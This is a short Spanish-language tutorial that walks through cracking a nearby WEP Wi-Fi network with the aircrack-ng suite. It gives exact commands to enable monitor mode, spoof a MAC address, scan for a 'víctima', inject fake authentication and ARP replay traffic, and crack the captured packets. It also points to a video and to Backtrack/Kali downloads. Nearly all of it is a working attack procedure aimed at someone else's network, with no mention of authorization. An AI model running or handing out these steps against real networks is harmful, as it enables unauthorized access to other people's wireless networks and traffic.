● Activamos modo monitor en nuestra tarjeta de red
» sudo airmon-ng start wlan0
● Damos de baja mon0
» sudo ifconfig mon0 down
● Cambiaremos la dirección MAC de mon0 por »00:11:22:33:44:55«
» sudo macchanger -m 00:11:22:33:44:55 mon0
● Damos de alta mon0
» sudo ifconfig mon0 up
● Escaneamos las redes, para encontrar a nuestra víctima
» sudo airodump-ng mon0
● Detenemos el escaneo presionando Ctrl -c
● Ejecutamos airodump-ng, cambiando los datos entre corchetes por los de la víctima
» sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
● Abrimos otra terminal cambiando los datos entre corchetes por los de la víctima
» sudo aireplay-ng -1 6000 -a [direccion MAC victima] -h 00:11:22:33:44:55 mon0
● Abrimos otra terminal
paso 1
aireplay-ng -3 -b [direccion MAC victima ] -h 00:11:22:33:44:55 mon0
● Abrimos otra terminal
paso 2
aireplay-ng -1 0 -e (Nomb red) -a (mac victima) -h 00:11:22:33:44:55 mon0
● Abrimos cuarta y última terminal SIN CERRAR LAS ANTERIORES
aircrack-ng (nombre de la red)-01.cap
A continuación te dejo un video, para que mires el proceso descrito anteriormente.
Descarga el plugin YAMAS a continuación.
Aclaraciones:
Este video fue hecho usando el sistema operativo Backtrack 5 R3 y actualmente ya fue remplazado por Kali Linux.
Con Kali Linux puedes hacer totalmente lo mismo que con Backtrack 5 R3 ya que es una versión mejorada.
- Si quieres descargar Backtrack 5 R3 puedes hacerlo desde aquí:
- Si deseas descargar Kali Linux puedes hacerlo desde aquí: